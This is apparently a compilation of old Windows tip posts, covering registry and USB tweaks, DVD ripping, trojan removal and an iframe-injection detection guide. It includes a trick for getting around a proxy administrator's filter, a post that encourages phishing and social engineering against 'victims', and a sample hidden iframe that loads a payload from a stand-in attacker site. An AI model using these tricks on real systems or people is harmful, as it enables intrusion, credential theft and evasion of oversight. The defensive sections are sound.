How to Open Locked Registry


Trick to Open locked registry

I got this trick from nebulla

The registry is a vital component of the Windows OS. It stores many values, each of which controls a particular function of your system. Some viruses add values that make your system unstable and lock the registry. Many tools are available to "communicate" with this component, but you can also make a simple private tool to do so when your registry has been locked. Try this code. You can paste it into the Notepad editor.


<======start point=======>
'Enable/Disable Registry Editing tools
'© Doug Knox - rev 12/06/99

Option Explicit

'Declare variables
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype

Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"
p = p & "DisableRegistryTools"
itemtype = "REG_DWORD"
mustboot = "Log off and back on, or restart your pc to" & vbCR & "effect the changes"
enab = "ENABLED"
disab = "DISABLED"
jobfunc = "Registry Editing Tools are now "

'This section tries to read the registry key value. If not present an
'error is generated. Normal error return should be 0 if value is
'present
t = "Confirmation"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
'Capture the error number before On Error Goto 0 resets the Err object
errnum = Err.Number
On Error Goto 0

If errnum <> 0 Then
'Create the registry key value for DisableRegistryTools with value 0
WSHShell.RegWrite p, 0, itemtype
n = 0
End If

'If the key is present, or was created, it is toggled
'Confirmations can be disabled by commenting out
'the two MyBox lines below

If n = 0 Then
n = 1
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
ElseIf n = 1 then
n = 0
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & enab & vbCR & mustboot, 4096, t)
End If
<======End point======>

Save it as regtools.vbs. To execute it, just double-click it.
I hope it is useful for you... Don't forget to leave your comments.

How to Rip & Shrink a FULL DVD movie, Backup a DVD, DVD Shrink, DVD Decrypter, Tutorial


Written by:
Mike Ly


What does more than 4.7GB in size mean?
GB is a measure of capacity. 1 GB means 1 Gigabyte, which is equal to 1,024 MB (Megabytes). Most recent DVD movies are more than 4.7GB in size; old movies are usually smaller than 4.7GB. The reason is that most of them now have special features, specials, multiple languages and more, which take a lot more space. Most ripping programs state the capacity of the DVD movie in Megabytes. Let's start.

  1. Hardware needed:
    • DVD Burner
    • DVD-ROM (Optional - for ripping only)
  2. FREE Programs (discontinued) are Needed:
    • DVD Shrink - (download here: DVD Shrink Download)
    • DVD Decrypter - (download here: DVD Decrypter Download)
Here are the steps to back up a whole DVD (i.e. movie, movies, including special features) that is more than 4.7GB in size; otherwise go to the tutorial for DVDs less than or equal to 4.7GB.
Ripping with DVD Shrink
  1. Open DVD Shrink
  2. Click "Open Disk"
  3. Select your DVD-ROM/Burner where your movie is located; this will load the movie, and DVD Shrink will take a couple of minutes to analyze it.
  4. Under "Full Disk Backup" select "Menu", then under "Video"'s drop-down menu, select "Custom Ratio".
  5. Move the slider all the way to the left to shrink it.
  6. Select the "Extras" and do the same thing as steps 4 & 5; do this for every single "Extras".
  7. If there is any "Unreferenced Material", do the same thing as steps 4 & 5.
  8. Click the "Full Disc" square button; at the "Back Up" DVD screen, select "ISO Image"; the "select target image file" is the location and the ISO name.
  9. "Encoding" will start, which can typically take considerable time, depending on your computer hardware.
  10. "Back Up Complete" appears when it's done creating the ISO, reminding you where the ISO file is located.

Burning the ISO with DVD Decrypter:
  1. Start DVD Decrypter and let it load
  2. Select Mode > ISO > Write
  3. Select your DVD Burner in the "Destination"
  4. Under "Source", select the ISO file created by DVD Shrink in step I
  5. Click on the big Write Button that has the picture of the "hard drive, green arrow, and dvd" under the "Destination" box
  6. This will start the burning
  7. That's it!

9 Steps To Protect Your System from Viruses


Nowadays, as the Internet and other networks are highly developed, computer viruses are distributed rapidly and intensively. Every day several new viruses capable of considerably damaging your computer system arise. Anti-virus specialists work hard to update their software against new viruses as soon as possible. Viruses can get inside a computer in different ways. That is why there is no simple method to protect a system. Only a series of measures can give you reliable protection from infection. Below are 9 steps to protect an MS Windows based PC system from viruses.
  1. Make regular backups. It should be said that there is no absolutely safe way of protection. Virus creators regularly find holes in new computer products to use them for infecting computer systems. Some dangerous viruses can considerably damage data files or even erase the entire file system. Make regular backups of your data files to a separate file storage device. It can be a separate hard drive, flash card, compact disc or another file storage device of your choice. To ease the procedure you can use automatic backup software. And be ready in case the system dies because of a virus infection.
  2. Be ready to reinstall your system if it dies because of viruses. Get the installation media for your operating system and for the software you use, and keep them together, for instance on a set of CDs close at hand. Then, if a virus infection causes an unrecoverable system failure, you can rapidly reinstall your working environment.
  3. Protect your network connection with a firewall. A firewall is software which blocks suspicious, potentially dangerous connections to prevent viruses on the network from penetrating your system. Windows XP has a quite simple but reliable built-in firewall. You can enable it as follows. 1) In Control Panel, double-click Networking and Internet Connections, and then click Network Connections. 2) Right-click the connection on which you would like to enable the firewall, and then click Properties. 3) On the Advanced tab, check the option to Protect my computer and network.
  4. Use antivirus software. Install antivirus software which will scan your system, searching for and erasing viruses on a regular basis. Leaders in antivirus software products for Windows systems are Norton Antivirus, McAfee, Kaspersky Anti-Virus and PC-cillin.
  5. Regularly update the operating system. Windows XP has a built-in automatic update service. It regularly contacts the Microsoft server to find updates and notifies you if updates are ready to be installed. Updates are important because hackers regularly find holes in the operating system, which are often used by virus creators.
  6. Don't install and don't run suspicious software. Check new programs which you are going to install with anti-virus software. Don't download software from suspicious websites. To download software, always seek the website of the software creator or official distributor. Do not open applications received by email from unknown persons.
  7. Limit access to your computer. Protect entry to the system with a password.
  8. If you use Internet Explorer, consider moving to another browser. As IE is the most widely used browser today, virus creators actively use defects in its security system to infect computers. Infection may arise if you visit a webpage which contains invisible harmful code. You are safer if you use a less known browser, only because virus creators do not pay much attention to it. The major IE competitors, Firefox and Opera, now provide the same comfortable interface and range of services for working on the Web.
  9. Use spam protection. Viruses are often distributed via email. Switch on spam filters in your mailbox to block spam. If you need assistance with using the filters, you can ask your email service provider.
That's all from me. I hope it will be useful for you.

Lock Your USB Flashdisk Port


Trick to block your USB flashdisk

A USB flash disk is the most practical mobile storage for saving our data. We can save anything to it, and open anything from it, by plugging it into the USB port. But sometimes a USB flash disk becomes the "way" for some viruses to spread. Viruses create an autorun program to automatically infect your system when the USB flash disk is connected. You can easily prevent this with a simple trick that makes your computer refuse USB flash disks. The steps are as follows:
  1. Click Start, and then click Run, or use the Windows hotkey by pressing the Windows button and R together.
  2. In the Open box, type regedit, and then click OK.
  3. Locate, and then click the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor.
  4. In the right pane, double-click the value named Start.
  5. In the Value data box, type 4 (the default value is 3), click the Hexadecimal radio button (if it is not already selected), and then click OK.
  6. Don't forget to refresh the registry by pressing F5.
  7. Quit Registry Editor.
That's the whole trick to prevent any USB flash disk from being read by your computer. I hope it is useful for you...
Give your comment to make my article better than ever...
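
The two registry values this page changes by hand (DisableRegistryTools in the first post and the UsbStor Start value above) can be checked offline from a regedit export. This is an added example, not code from the original posts; the sample export text and the names POLICY, parse_dwords and audit are made up for illustration.

```python
import re

# Constructed sample in the layout regedit writes when exporting keys.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
"Wallpaper"="C:\\Windows\\web\\wallpaper.bmp"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR]
"Type"=dword:00000001
"Start"=dword:00000003
'''

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{1,8})$')

# Assumed policy for this example: registry tools unlocked, USB storage blocked.
# Fields: key, value name, wanted DWORD, finding text, "absent is fine" flag.
POLICY = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System",
     "DisableRegistryTools", 0, "registry editing tools are locked", True),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor",
     "Start", 4, "USB storage driver is not disabled", False),
]


def parse_dwords(reg_text):
    """Return {(key, name): int} for every REG_DWORD line in an export.

    Key and value names are lower-cased because the registry is
    case-insensitive (the export says USBSTOR, the page says UsbStor).
    """
    values = {}
    key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key").lower()
            continue
        m = DWORD_RE.match(line)
        if m and key is not None:
            values[(key, m.group("name").lower())] = int(m.group("hex"), 16)
    return values


def audit(reg_text):
    """Compare an export against POLICY; return (name, actual, finding) tuples."""
    values = parse_dwords(reg_text)
    findings = []
    for key, name, wanted, text, absent_ok in POLICY:
        actual = values.get((key.lower(), name.lower()))
        if actual is None:
            if not absent_ok:
                findings.append((name, None, "value missing from export"))
        elif actual != wanted:
            findings.append((name, actual, text))
    return findings


if __name__ == "__main__":
    for name, actual, text in audit(SAMPLE_REG):
        print(f"{name} = {actual}: {text}")
```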

trojan.win32.vb.kcd



Trick to remove trojan.win32.vb.kcd

Its name is trojan.win32.vb.kcd. It was made using VB 6.0. One effect of this virus is that it moves all of your original .doc and .xls files to C:\Windows\system32\MB and replaces them with files that have your original file names but the .exe extension.
The step-by-step removal is as follows:
  1. Remove file C:\Windows\system32\MB\WORD.scr
  2. Press (Win Button+R) and type regedit.exe to open the registry editor
  3. Go to "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" and look in the right pane for the value named WORD.scr
  4. Terminate the process named rstrui.exe through Task Manager. You can right-click on the taskbar and select Task Manager
  5. Remove file C:\Windows\system32\MB\rstrui.exe
  6. Find the files which have the .exe extension and are 140 KB in size. These files have the Word icon. Remember to include files with the hidden attribute by checking the "find the hidden file" radio button in the search criteria
  7. If such files are found, you should delete them.
Those are all the steps to eliminate the virus manually without any antivirus software. May it be useful for you.

Thanks to Ahmad Syahruddin

Portable Spyware Terminator


Posted from D3vill

This spyware scanner and removal tool does the job, but enabling some functions may cause slight slowdowns and it's not ready for Vista. Spyware Terminator's crisp, clean interface uses simple buttons and tabs to operate and set options. The latest spyware signatures are automatically downloaded, and the real-time protection keeps baby-sitting to a minimum. Real-time protection monitors key spyware types and Windows objects, though slight system slowdowns depend on your machine. Those features and the simple scheduler will make this app appealing to novices.

Advanced users will appreciate Spyware Terminator's flexibility. Setting the sensitivity of various scans is as easy as moving a slider. Experienced users will want to enable the built-in antivirus tool, which extends the power of real-time analysis by comparing program code against a database of known viruses, Trojans, and worms.


From set-it-and-forget-it users to those delving into virus code, all will find Spyware Terminator flexible,
simple, and effective, key measures of a good antispyware tool.

Program Highlights:
• Effectively Protects Your Computer from Spyware
• Safely Store Quarantine Detected Spyware
• Easy to Use, Easy to Setup
• Manual & Scheduled Scans Keep Your Computer Spyware-Free
• Automatically Download Updates that Keep Spyware Terminator Current

Basic Program Features:
• Free 100% Real-Time Protection is included in Spyware Terminator basic version - an essential function most other applications charge you extra for. Effectively remove spyware, adware, trojans, keyloggers, home page hijackers and other malware threats.
• Safe Quarantine. Suspect files found during the scan are moved into Quarantine. Spyware Terminator prevents them from functioning and causing further damage to your computer. You can review and choose to permanently remove suspect files or safely store essential files.
• Easy to Use. Spyware Terminator lets people of all skill levels detect and eliminate spyware. If you remove a program by mistake, you can easily put it back.
• Manual & Scheduled Scan. Scan your computer manually or schedule an in-depth scan to be performed on a regular basis. The scan process runs in the background so that you will not be disrupted while working on other tasks.
• Automatic Update Downloads. Spyware Terminator can be set to automatically download updates, ensuring the most effective protection for your computer.
• Effective Spyware Protection
Spyware Terminator prevents spyware from infecting your computer.
• Free 100% Real-Time Protection
Guards your system and ensures spyware is intercepted before it installs.
• Antivirus Protection Included
Extended detection of malware during scans and within the Real-Time Shield.
• Safe Internet Browsing and Search
Web Security Guard displays websites' reviews and threat level to help prevent users from entering potentially dangerous websites.
• Now Free for Both Personal and Commercial Use
Spyware Terminator is now available free for both home and business use.

Download Link
http://uploading.com/files/EPS5OITJ/Spyware.Terminator.2.5.8.145.Portable.rar.html

How Long to Load?


Would you like to know how long your computer takes to load a webpage? Now you can use this program to measure the time for you. Its name is StopWatch; you can access it by clicking here! Enter the URL to be measured and watch the top of the window.
The StopWatch can only measure websites that can be displayed in a frame. Some websites use JavaScript to break out of frames. Don't worry, this is not a StopWatch bug.

Unblocked Proxy


Have you ever had a site blocked at the proxy by your administrator? You will surely be very annoyed. OK, I will share a trick to bypass a proxy's restriction. This test was done under proxy squid 2.5 stable 10 and succeeded. It has not yet been tested on proxy servers other than squid.
The example we use is rapidshare.

The blocked picture is as follows:
[image: unavailable]
And the success picture is as follows; we just inserted a simple command to open rapidshare.
[image: success]
The trick above can be used to download files too, e.g. http://thecybergal/takefile.zip. Normally, the file will be blocked by the proxy. But you can still download your file by appending a little command "?gmail.com" (without quotes) to the end of the address. So, the complete address will look like this: "http://thecybergal/takefile.zip?gmail.com". Finally, the download progress will be seen...

The link above is just an example. Does this trick work properly? I hope your admin hasn't read this article yet.

Thanks to:
ilham2930
Original source : xtremenitro
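
For the administrator's side of the post above: an added example (not from the original post) of why appending "?gmail.com" can get a blocked URL through, and the host-based check that closes the gap. It assumes the proxy's allow rule is a pattern searched over the whole URL, which the post does not show; the rule lists and function names are made up for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumed policy (the post does not show the proxy configuration).
ALLOW_DOMAINS = ["gmail.com"]
BLOCK_DOMAINS = ["rapidshare.com"]
BLOCK_EXTENSIONS = [".zip"]

# Constructed sample requests, using the URLs quoted in the post.
SAMPLE_URLS = [
    "http://thecybergal/takefile.zip",
    "http://thecybergal/takefile.zip?gmail.com",
    "http://rapidshare.com/",
    "http://rapidshare.com/?gmail.com",
    "http://mail.gmail.com/inbox",
]


def host_in(host, domains):
    """True when host equals a listed domain or is a subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def is_blocked(url):
    """Block rules: destination host or file extension of the path."""
    parts = urlsplit(url)
    return host_in(parts.hostname, BLOCK_DOMAINS) or any(
        parts.path.lower().endswith(ext) for ext in BLOCK_EXTENSIONS)


def weak_decision(url):
    """Allow rule searched over the full URL string (query string included)."""
    if any(re.search(re.escape(d), url, re.I) for d in ALLOW_DOMAINS):
        return "allow"
    return "deny" if is_blocked(url) else "allow"


def strict_decision(url):
    """Allow rule compared with the parsed destination host only."""
    if host_in(urlsplit(url).hostname, ALLOW_DOMAINS):
        return "allow"
    return "deny" if is_blocked(url) else "allow"


def compare(urls):
    """Return (url, weak result, strict result) for each request."""
    return [(u, weak_decision(u), strict_decision(u)) for u in urls]


if __name__ == "__main__":
    for url, weak, strict in compare(SAMPLE_URLS):
        print(f"{weak:5} {strict:5} {url}")
```

In Squid terms the host-only comparison corresponds to a dstdomain ACL, while a url_regex ACL is matched against the full URL.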

Make Firefox Faster


This trick was posted on the yogyafree forum by "DEL_CAESAR". I am just reposting it to share with you. OK, let's get it done.
  1. Type "about:config" (without quotes) in the address bar, scroll down and find the entries below:

    network.http.pipelining
    network.http.proxy.pipelining
    network.http.pipelining.maxrequests

    Normally, the browser makes one request for a web page at a time. When you enable pipelining, several will be requested at once, which makes page loading better.
  2. Change the entries below:

    set "network.http.pipelining" => "true"
    set "network.http.proxy.pipelining" => "true"
    set "network.http.pipelining.maxrequests" => whatever you want, e.g. 30. This means there are 30 requests at once.
  3. Lastly, right-click anywhere, select New->Integer, give "nglayout.initialpaint.delay" as the preference name, and set the value to "0".

That's all, may it be useful for you...

Important Fact About Trojan Viruses


From casual computer users to those who spend hours on the Web, knowing the facts about Trojan viruses is a must. If you store personal info on your PC, learning to protect yourself from these programs is necessary.

Definition

Technically, these aren't viruses. These are actually programs / software. However their actions and purpose are the same as viruses. For average computer users, the definition isn't as important as knowing how to spot and eliminate them.

What the Viruses Can Do

Their activities are often called payloads or attacks. These are classified into different types. Remote attacks go after FTP or HTTP servers. They can interrupt downloading of files. These viruses can also interfere with server requests and other processes. These Trojan viruses can also hack into proxy servers.


Payloads aren't limited to networks. Once active they can destroy files on hard disks. Others will attack the boot system. Once this happens the PC won't be able to boot up. Others are able to get personal information and passwords. These are relayed to various sites via HTTP.

The Way the Virus Works

It's impossible to give a standard process. These are created by different programmers. They do share common characteristics though. The most important is that they operate in secret. Most of the time, users won't know it's been activated. Only when the Trojan viruses are doing their damage will it be apparent.

How the Viruses Get in a PC

One way is by downloading. A user downloads a game or other software. He or she is unaware that the virus is included in the software. When the game is run, the virus is installed with it.

Another way is through email. The virus is attached to the email. The user unknowingly opens it, infecting the computer. Often, the attachment is passed on to other users. The scenario repeats itself, and that's how it spreads.

Not to be discounted is pirated software. This comes on DVD / CD or is downloaded from the Web. Both sources are filled with Trojan viruses and other malware.

Protecting Yourself

Get an antivirus application. Install it and download the updates regularly. Run a virus scan whenever you download software. Never turn it off when you are online. Run a full virus scan at least every week. An anti spyware program will also help. Use it in conjunction with your antivirus software.

Always back up your documents. It should be done weekly at the very least. If your system is infected, run the virus scanner first. Don't back them up until your computer has been cleared.

Never open an email attachment without scanning it. Don't just rely on the email service scanner. Run one yourself. Needless to say, you should never use pirated software. Never install ActiveX or Java applets from suspicious looking websites.

Always read up on the latest news about Trojan viruses. You can never be too careful when it comes to your files. Take all the necessary precautionary steps as suggested. This will keep your data safe.

The Computer Acronyms


Got from rocktuts

You have to know about these computer acronyms

Let's see !
ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft /min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Committed to Excellence)

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ADSL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS - Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

JBL - JBL (James B. Lansing) Speakers
JVC - JVC Company of America

Kbps - Kilobits Per Second
KBps - KiloBytes per second

LG - LG Electronics
LAN - Local Area Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

MAC - Media Access Control
MB - MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Converter
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshielded Twisted Pair

VCD - Video CD
VPN - Virtual Private Network

WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

What is Spy-Ware?


Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.

Most spyware is adware. The main purpose of an adware program is to capture "anonymous" data for targeted advertising. Adware is usually just an annoyance, but sometimes it can cause greater difficulties.

The less common kind of spyware is called malware. Malware is a program that is designed to cause problems with a computer. Malware includes viruses, Trojan horse programs, and certain forms of hijacking spyware. These types of spyware are written to get personal information such as email passwords, internet banking passwords, credit card numbers, and social security numbers for fraud. Many spyware programs can change default program settings to allow an attacker access to the computer, or monitor a user's keystrokes to get information. The information is then sent off to the attacker via email without the user's knowledge or intervention.

There are thousands out there, and new ones are added to the list every day. But here are a few:
Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

Hacking Techniques


Adopted from Hacker Hubz

So, it's time now that we should know what various categories hacking falls into. I will try to focus on the ones based on password hacking. There is no distinct classification of hacking.. but I will list all I could remember..
So, as you all would have guessed this will not be a practical application.. I will give tutorials on all of them in coming posts.. but it's the most important thing to have basic knowledge about all the techniques available.. So, consider going through the post once..
Common Methods for Hacking Computer Terminals (Servers): This comprises either taking control over a terminal (or server), rendering it useless, or crashing it.. The following methods have been used for a long time and are still used..


1. Denial of Service - DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic(which can be e-mail or Transmission Control Protocol, TCP, packets).
2. Distributed DoSs - Distributed DoSs (DDoSs) are coordinated DoS attacks from multiple sources. A DDoS is more difficult to block because it uses multiple, changing, source IP addresses.
3. Sniffing - Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.
4. Spoofing - Spoofing is the act of sending an illegitimate packet with an expected acknowledgment (ACK), which a hacker can guess, predict, or obtain by snooping
5. SQL injection - SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. It uses normal SQL commands to get into the database with elevated privileges..
6. Viruses and Worms - Viruses and worms are self-replicating programs or code fragments that attach themselves to other programs (viruses) or machines (worms). Both viruses and worms attempt to shut down networks by flooding them with massive amounts of bogus traffic, usually through e-mail.
7. Back Doors - Hackers can gain access to a network by exploiting back doors: administrative shortcuts, configuration errors, easily deciphered passwords, and unsecured dial-ups. With the aid of computerized searchers (bots), hackers can probably find any weakness in the network.
So, not interested in these stuffs.. huh??? wait there is more for you.. So, how about the one related to hacking the passwords of email and doing some more exciting stuffs.. The various methods employed for this are:
8. Trojan Horses - Trojan horses, which are attached to other programs, are the leading cause of all break-ins. When a user downloads and activates a Trojan horse, the software can take the full control over the system and you can remotely control the whole system.. great..!!! They are also referred to as RATs (Remote Administration Tools)
9. Keyloggers - Consider the situation, everything you type in the system is mailed to the hacker..!! Wouldn't it be easy to track your password from that.. Keyloggers perform similar functionalities.. So next time you type anything.. Beware..!! Have already posted about keyloggers and ways to protect yourself from them..
10. BruteForcing - The longest and most tiring job.. don't even consider this if you don't know the SET of password for your victim..
11. Secret Question - According to a survey done by security companies, it is found that rather than helping the legitimate users the security questions are more useful to the hackers.. So if you know the victim well try this..
12. Social Engineering - Ya this was one of the oldest tricks to hack.. Try to convince your user that you are a legitimate person from the system and need your password for the continuation of the service or some maintenance.. This won't work now since most of the users are now aware about the Scam.. But this Social Engineering concept is a must for you to have to convince the victim for many reasons..!!!
13. Phishing - This is another type of keylogging, here you have to bring the user to a webpage created by you resembling the legitimate one and get him to enter his password, to get the same in your mail box..!! Use social engineering..
14. Fake Messengers - So it's a form of phishing in the application format.. getting the user to enter the login info in the software and check your mail..!!!
15. Cookie Stealer - Here the cookie saved by the sites are taken and decoded and if you get lucky.. You have the password..!!!
Hmmm.. not satisfied with single account at a time..?? so there are ways to hack lots of accounts together.. I know few but there exists many..!! listed are the ones i know and will teach you in coming posts...
16. DNS Poisoning or PHARMING - So, phishing is a tough job.. isn't it..?? convincing someone to enter their password at your page..?? what if you don't have to convince..?? what if they are directed automatically to your site without having a clue..?? Nice huh..?? Pharming does the same for you.. More about it in my next post..
17. Whaling - This method gets you the password of the accounts which are used by the hackers to receive the passwords.. So you just have to hack one ID, which is the simplest method (easier than hacking any other account, will tell you how in coming posts..) and you will have loads of passwords and so loads of accounts at your mercy..!!!

Measures to Prevent and Detect iFrame Injection Attack


On behalf of Joseph Schembri

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. The following is an example of a malicious iframe injection code:

<iframe src="http://www.example-hacker-site.com/inject/?s=some parameters" width="1" height="1" style="visibility: hidden"></iframe>

The iframe tag is an HTML tag used to seamlessly embed content from another page or site. (The "i" in "iframe" stands for "invisible", i.e. "invisible frame".) IFrames are used on thousands and thousands of sites, because that's what Google uses for its AdSense ads - the little bit of JavaScript you paste on your page eventually ends up inserting an iframe into the HTML of your page.

Like most useful things, iFrames can be used for good or for bad.

An iframe injection is an injection of one or more iframe tags into a page's content. The iframe typically does something bad, such as downloading an executable application that contains a virus or worm in it... something that compromises a visitor's system.

Typically, all your index.* files in your server are infected with a piece of code that loads a hidden iframe in the page. Examples of these pages are:

index.htm
index.html
index.shtml
index.php

The intent of this article is to show what preventative measures you can use to prevent or detect iframe injection attacks to your website.

Step 1

The first thing you need to do is to check with Google to see if your site is listed as suspicious. You can do this by using the following link:

http://www.google.com/safebrowsing/diagnostic?site=http://yourdomain_name

Before you use the link, you need to replace "yourdomain_name" with your actual website name.

Google will tell you if your website is suspicious or not.

You can also go to the following website and enter your "www.yourdomain_name". It will advise you on your website status.

http://www.unmaskparasites.com/

Step 2

If you have suffered an iframe injection attack you need to act fast. If the security of your website is compromised, it can affect the search engine rankings of your website. Besides, it may pave the way for more sophisticated attacks. Google will mark your site in its search results with a warning: "This site may harm your computer". If a visitor sees the message "This site may harm your computer" pop up when (s)he tries to access your website/blog, (s)he may not return again and your traffic will go down to zero.

I suggest that you read the article "Website Protection Against iFrame Injections" which you can find at:

http://websiteprotection.blogspot.com/

and also visit:

http://www.websiteprotection.net

Step 3

If you have not suffered an iframe injection attack, then you can manually run some scripts which will test the index.* files on your website.

One script you can use is called "clean.php" which you can download at:

http://www.diovo.com/wp-content/uploads/2009/04/clean.php.txt

Copy and paste this script into your text editor, such as notepad, and save the file as "clean.php"

Remember that when you create a web page, it is important to use a pure text editor such as Notepad or an editor designed to create web pages. Never use Word or a word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can create problems with web servers. Also, when you save the web page, ensure that it has the proper file extension, e.g., index.html, clean.php, etc.

Before you can use the file, you need to change the following line in the script:

$webpath ="Type your domain name here. Eg:http://www.diovo.com/";

which will become:

$webpath ="http://www.yourdomain_name/";

Where "yourdomain_name" is replaced with your actual domain name.

In the script, the "s" parameter specifies the file name to search for and the "c" parameter specifies the text to search for inside the file.

When you have pasted the above script into your notepad editor, made the change for your website name, save it as "clean.php". Once you have saved the file, upload it to the root directory of your website.

Now you need to create a URL that you will copy and paste into your browser as follows:

http://www.yourdomain_name/clean.php?s=index.php&c=iframe

where "yourdomain_name" is replaced by your actual domain name.

The web page to be checked is given by "s=index.php" and the text to be found is "c=iframe". This will scan all your files and folders on your website for index.php injections.

Since we also want to check our index.html type web pages, we create a different URL as follows:

http://www.yourdomain_name/clean.php?s=index.html&c=iframe

The file to be checked is given by "s=index.html" and the text to be found is "c=iframe". This will scan all your files and folders on your website for index.html injections.

The URL will list all the "index.php" or "index.html" files in your website and, if any of the files contains the given string, it will print the part with the string. An infected file is the one shown with the iframe script displayed next to it.

Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So you will have to clean the files manually by deleting the iframe script.

You should be able to see that you can use the "s" parameter to test any web page on your website for iframe injection. Simply put in the exact webpage as follows:

